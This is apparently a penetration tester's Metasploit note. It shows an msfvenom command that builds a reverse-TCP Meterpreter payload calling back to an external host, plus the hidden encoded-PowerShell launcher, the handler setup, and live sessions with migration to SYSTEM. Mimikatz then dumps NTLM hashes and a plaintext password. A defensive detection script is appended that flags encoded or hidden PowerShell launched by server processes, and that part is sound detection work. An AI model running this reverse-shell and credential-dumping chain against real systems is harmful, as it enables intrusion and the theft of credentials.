Metasploit Notes 2
Ran into an RCE and wanted to bring in the big gun, MSF. `systeminfo` showed the box was Windows 7, so PowerShell came to mind: very convenient.
After generating a .ps1 with msfvenom, the format didn't look right. Checked the help: the psh-cmd output format is the one to use, since it produces a single command line that launches an encoded PowerShell payload. Really convenient, so here is the note.
```
msf > msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=443 LHOST=lu4n.com -f psh-cmd
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=443 LHOST=lu4n.com -f psh-cmd

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of psh-cmd file: 6739 bytes
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e <base64 payload omitted>
msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST lu4n.com
LHOST => lu4n.com
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > run

[*] Started reverse TCP handler on 103.27.187.212:443
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (103.27.187.212:443 -> 1.1.1.1:27185) at 2017-06-24 17:12:16 +0800

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.107 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > run

[*] Started reverse TCP handler on 103.27.187.212:443
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (103.27.187.212:443 -> 2.2.2.2:63796) at 2017-06-24 17:13:12 +0800

meterpreter > sysinfo
Computer        : JDE920-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > ps

Process List
============

 PID   PPID  Name                          Arch  Session  User                          Path
 ---   ----  ----                          ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                        x64   0
 256   4     smss.exe                      x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 272   476   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 332   320   csrss.exe                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 380   372   csrss.exe                     x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 388   320   wininit.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 416   372   winlogon.exe                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 476   388   services.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 484   388   lsass.exe                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 488   476   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 492   388   lsm.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 588   476   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 652   476   VBoxService.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\VBoxService.exe
 664   1768  cmd.exe                       x64   1        JDE920-PC\JDE920              C:\Windows\system32\cmd.exe
 716   476   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 808   476   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 840   476   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 868   476   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 1132  476   spoolsv.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1184  476   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1260  476   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1308  476   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1348  476   FoxitConnectedPDFService.exe  x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe
 1428  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
 1460  1768  VBoxTray.exe                  x64   1        JDE920-PC\JDE920              C:\Windows\System32\VBoxTray.exe
 1464  1576  opmn.exe                      x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\opmn\bin\opmn.exe
 1572  1768  cmd.exe                       x64   1        JDE920-PC\JDE920              C:\Windows\System32\cmd.exe
 1576  2024  opmn.exe                      x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\opmn\bin\opmn.exe
 1580  476   TNSLSNR.EXE                   x64   0        JDE920-PC\920JDE              C:\Oracle\E1Local\BIN\TNSLSNR.exe
 1656  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
 1716  840   dwm.exe                       x64   1        JDE920-PC\JDE920              C:\Windows\system32\Dwm.exe
 1732  476   taskhost.exe                  x64   1        JDE920-PC\JDE920              C:\Windows\system32\taskhost.exe
 1768  1704  explorer.exe                  x64   1        JDE920-PC\JDE920              C:\Windows\Explorer.EXE
 1876  476   oracle.exe                    x64   0        JDE920-PC\920JDE              c:\oracle\e1local\bin\ORACLE.EXE
 1940  476   oravssw.exe                   x64   0        JDE920-PC\920JDE              c:\oracle\e1local\bin\OraVSSW.exe
 2160  476   wmpnetwk.exe                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Program Files\Windows Media Player\wmpnetwk.exe
 2176  1572  java.exe                      x64   1        JDE920-PC\JDE920              C:\Oracle\MIDDLE~1\OVR_HOME\ORACLE~2\jdk\bin\java.exe
 2676  476   ducservice.exe                x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\No-IP\ducservice.exe
 2792  476   SearchIndexer.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchIndexer.exe
 3012  476   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 3136  1464  sawserver.exe                 x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\web\bin\sawserver.exe
 3144  1464  java.exe                      x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\jdk\bin\java.exe
 3152  1464  nqsserver.exe                 x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqsserver.exe
 3164  1464  nqscheduler.exe               x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqscheduler.exe
 3180  1464  nqsclustercontroller.exe      x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqsclustercontroller.exe
 3824  6196  java.exe                      x86   1        JDE920-PC\JDE920              C:\PROGRA~2\Java\JDK17~1.0_8\bin\java.exe
 4288  4492  LaunchJVM.exe                 x86   1        JDE920-PC\JDE920              C:\JDEdwards\E920\system\bin32\LaunchJVM.exe
 4348  5764  fenix.exe                     x86   1        JDE920-PC\JDE920              C:\ProgramData\Fenix\fenix.exe
 4492  1768  activConsole.exe              x86   1        JDE920-PC\JDE920              C:\JDEdwards\E920\system\bin32\activConsole.exe
 4668  4492  iexplore.exe                  x86   1        JDE920-PC\JDE920              C:\Program Files (x86)\Internet Explorer\iexplore.exe
 5104  4668  iexplore.exe                  x86   1        JDE920-PC\JDE920              C:\Program Files (x86)\Internet Explorer\iexplore.exe
 5348  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
 5436  2176  powershell.exe                x64   1        JDE920-PC\JDE920              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 5736  4572  iexplore.exe                  x86   1        JDE920-PC\JDE920              C:\Program Files (x86)\Internet Explorer\iexplore.exe
 5764  1768  fenix.exe                     x86   1        JDE920-PC\JDE920              C:\ProgramData\Fenix\fenix.exe
 6160  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
 6196  6204  cmd.exe                       x86   1        JDE920-PC\JDE920              C:\Windows\SysWOW64\cmd.exe
 6220  3824  cmd.exe                       x86   1        JDE920-PC\JDE920              C:\Windows\SysWOW64\cmd.exe
 6528  4492  jdenet_n.exe                  x86   1        JDE920-PC\JDE920              C:\JDEdwards\E920\system\bin32\jdenet_n.exe
 7036  5436  powershell.exe                x64   1        JDE920-PC\JDE920              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 7060  6220  java.exe                      x86   1        JDE920-PC\JDE920              C:\PROGRA~2\Java\JDK17~1.0_8\bin\java.exe
 7140  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe

meterpreter > migrate 2792
[*] Migrating from 7036 to 2792...
[*] Migration completed successfully.
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;102261  NTLM       JDE920-PC     920JDE         lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;98726   NTLM       JDE920-PC     920JDE         lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;92043   NTLM       JDE920-PC     JDE920         lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;86291   NTLM       JDE920-PC     920JDE         lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     JDE920-PC$     n.s. (Credentials KO)
0;24337   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     JDE920-PC$     n.s. (Credentials KO)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     JDE920-PC$
0;24337   NTLM
0;999     NTLM       WORKGROUP     JDE920-PC$
0;102261  NTLM       JDE920-PC     920JDE         123456
0;98726   NTLM       JDE920-PC     920JDE         123456
0;92043   NTLM       JDE920-PC     JDE920         123456
0;86291   NTLM       JDE920-PC     920JDE         123456

meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) >
```
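Seen from the defender's side, the psh-cmd launch line above is unusually loud: `powershell.exe` started with `-nop -w hidden -e <base64>`, and in the `ps` output the parent of that PowerShell (PID 5436) is a `java.exe` application server (PID 2176). The script below is an added example, not code from the original post or from Metasploit: it takes constructed process-creation records (shaped like the pid/ppid/image/command-line fields of a Sysmon event 1 or Security 4688 log, not real logs from the host in the post), decodes any `-EncodedCommand` argument (PowerShell expects UTF-16LE text, base64-encoded), and raises a finding when at least two independent indicators line up. The `SERVER_PARENTS` set and the two-indicator threshold are assumptions for illustration.

```python
"""Flag hidden/encoded PowerShell launches and decode their -e argument.

Added example for the Metasploit notes above; not the post's own code.
All input events below are constructed, not captured from a real host.
"""
import base64
import binascii
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    reasons: list
    decoded: str  # decoded -EncodedCommand text, or None


def encode_ps(command: str) -> str:
    """Encode text the way powershell.exe -EncodedCommand expects (UTF-16LE, base64).
    Used here only to build the constructed sample event."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


SAMPLE_COMMAND = "Write-Output 'constructed sample'"

# Constructed events. PIDs mirror the post's ps output (java.exe 2176 -> powershell.exe 5436);
# the command lines are invented, the benign launch from explorer.exe is for contrast.
EVENTS = [
    ProcEvent(1768, 1704, "explorer.exe", r"C:\Windows\Explorer.EXE"),
    ProcEvent(2176, 1572, "java.exe", "java.exe -jar app.jar"),
    ProcEvent(5436, 2176, "powershell.exe",
              "powershell.exe -nop -w hidden -e " + encode_ps(SAMPLE_COMMAND)),
    ProcEvent(9001, 1768, "powershell.exe",
              "powershell.exe -NoProfile -Command Get-Date"),
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENCODED_FLAG = re.compile(r"^[-/](?:e|ec|enc|encodedcommand)$", re.IGNORECASE)

# Assumption: server-side processes that have no business spawning PowerShell.
SERVER_PARENTS = {"java.exe", "w3wp.exe", "httpd.exe", "tomcat.exe", "php-cgi.exe"}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand text, or None if absent or not valid base64/UTF-16LE."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if ENCODED_FLAG.match(tok):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                return None
    return None


def analyze(events):
    """Score each powershell.exe launch; report when two or more indicators coincide."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if e.image.lower() != "powershell.exe":
            continue
        tokens = [t.lower() for t in e.cmdline.split()]
        reasons = []
        decoded = decode_encoded_command(e.cmdline)
        if decoded is not None:
            reasons.append("encoded command")
        if "-nop" in tokens or "-noprofile" in tokens:
            reasons.append("profile disabled")
        for i, t in enumerate(tokens[:-1]):
            if t in ("-w", "-windowstyle") and tokens[i + 1] == "hidden":
                reasons.append("hidden window")
        parent = by_pid.get(e.ppid)
        if parent is not None and parent.image.lower() in SERVER_PARENTS:
            reasons.append(f"spawned by {parent.image}")
        if len(reasons) >= 2:  # assumption: one indicator alone is too noisy
            findings.append(Finding(e.pid, reasons, decoded))
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"PID {f.pid}: {', '.join(f.reasons)}")
        if f.decoded is not None:
            print(f"  decoded -e: {f.decoded}")
```

Running it flags only PID 5436, with all four reasons and the decoded payload text, while the `-NoProfile` launch from explorer.exe stays below the threshold. In a real pipeline the same two checks map onto a SIEM rule: a `powershell.exe` process-creation event with an encoded command or hidden window, joined against the parent image; the process list in the post is exactly the kind of parent/child data that makes the java.exe to powershell.exe hop stand out.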